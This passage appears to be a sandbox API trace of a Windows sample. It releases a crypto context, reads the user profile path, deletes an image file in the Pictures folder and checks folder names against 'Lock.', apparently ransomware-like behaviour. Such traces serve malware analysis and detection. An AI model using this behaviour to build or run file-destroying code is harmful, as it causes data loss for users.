hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.212] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.212] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.213] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.213] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.213] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.213] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.213] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.213] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.213] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.213] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.213] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.213] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.213] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.213] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.214] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.214] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.214] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.214] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.215] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.215] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.215] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.215] CryptReleaseContext (hProv=0xa7c6e8, dwFlags=0x0) returned 1 [0211.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.215] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.215] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.215] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.215] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.215] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.215] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.215] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.215] CloseHandle (hObject=0x4dc) returned 1 [0211.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.216] CloseHandle (hObject=0x520) returned 1 [0211.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.220] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.220] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.220] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f6c0 [0211.221] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/pkrWGiqtaBO.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\pkrWGiqtaBO.gif", lpFilePart=0x8cedf4*="pkrWGiqtaBO.gif") returned 0x28 [0211.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0211.222] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\pkrWGiqtaBO.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\pkrwgiqtabo.gif")) returned 0x20 [0211.222] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\pkrWGiqtaBO.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca0f1f0, ftCreationTime.dwHighDateTime=0x1d5ce46, ftLastAccessTime.dwLowDateTime=0xf2ae86f0, ftLastAccessTime.dwHighDateTime=0x1d5d3f5, ftLastWriteTime.dwLowDateTime=0xf2ae86f0, ftLastWriteTime.dwHighDateTime=0x1d5d3f5, nFileSizeHigh=0x0, nFileSizeLow=0x18b56, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="pkrWGiqtaBO.gif", cAlternateFileName="PKRWGI~1.GIF")) returned 0x9e1ab8 [0211.222] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\pkrWGiqtaBO.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\pkrwgiqtabo.gif")) returned 1 [0211.224] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca0f1f0, ftCreationTime.dwHighDateTime=0x1d5ce46, ftLastAccessTime.dwLowDateTime=0xf2ae86f0, ftLastAccessTime.dwHighDateTime=0x1d5d3f5, ftLastWriteTime.dwLowDateTime=0xf2ae86f0, ftLastWriteTime.dwHighDateTime=0x1d5d3f5, nFileSizeHigh=0x0, nFileSizeLow=0x18b56, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="pkrWGiqtaBO.gif", cAlternateFileName="PKRWGI~1.GIF")) returned 0 [0211.224] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0211.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.225] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.228] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.228] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0211.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f6c0 [0211.230] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/pkrWGiqtaBO.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\pkrWGiqtaBO.gif", lpFilePart=0x8cf650*="pkrWGiqtaBO.gif") returned 0x28 [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0211.230] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\pkrWGiqtaBO.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\pkrwgiqtabo.gif")) returned 0xffffffff [0211.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.231] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0211.231] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.231] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Saved Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aved Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ved Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ed Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0211.232] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.232] HeapFree (in: hHeap=0x2af0000, 